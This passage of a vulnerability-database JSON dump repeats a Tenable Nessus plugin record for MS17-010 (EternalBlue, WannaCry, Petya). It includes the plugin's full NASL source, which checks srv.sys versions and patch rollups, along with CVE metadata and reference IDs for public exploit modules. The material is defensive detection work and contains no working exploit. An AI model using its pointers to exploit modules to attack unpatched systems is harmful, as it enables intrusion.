file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows 
Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-12T14:05:28", "differentElements": ["vpr"], "edition": 11}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "c3cfbf804787e9c7754f38fc5f836f24", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-18T12:46:18", "history": [], "viewCount": 2979, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", 
"1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T12:46:18", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-18T12:46:18", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", 
min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows 
Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-18T12:46:18", "differentElements": ["vpr"], "edition": 12}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "b9abd8135dbfca43008678d0346e679b", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-19T00:54:29", "history": [], "viewCount": 2979, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", 
"1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
